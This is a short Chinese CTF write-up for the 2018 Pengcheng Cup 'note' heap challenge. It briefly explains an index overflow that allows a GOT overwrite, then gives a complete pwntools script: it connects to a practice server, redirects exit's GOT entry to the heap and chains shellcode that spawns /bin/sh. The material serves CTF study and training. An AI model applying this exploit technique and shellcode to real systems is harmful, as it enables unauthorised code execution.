鹏城杯_2018_note
首先,检查一下程序的保护机制
然后,我们用IDA分析一下,在edit功能里,index的值可以被nptr溢出覆盖,因此,我们可以控制index的值,这样,我们就可以在GOT里写入一个堆地址。
由于没有开启NX保护,我们只需要再在堆里布置shellcode即可。
#coding:utf8
from pwn import *
context(os='linux',arch='amd64')
#sh = process('./2018_note')
sh = remote('node3.buuoj.cn',28075)
def add(index,size,content):
sh.sendline('1')
sleep(0.01)
sh.sendline(str(index))
sleep(0.01)
sh.sendline(size)
sleep(0.01)
sh.sendline(content)
#溢出覆盖index,使得heap[i]对应exit的got表,这样就能将exit的got表修改为一个heap地址
payload = '13'.ljust(0xA,'\x00') + p32(0xFFFFFFF8)
sc1 = asm('''mov rax,0x0068732f6e69622f
jmp $+0x16
''')
add(0,payload,sc1)
sc2 = asm('''push rax
xor rax,rax
mov al,0x3B
mov rdi,rsp
jmp $+0x17
''')
add(1,'13',sc2)
sc3 = asm('''xor rsi,rsi
xor rdx,rdx
syscall
''')
add(2,'13',sc3)
#getshell
sh.sendline('5')
sh.interactive()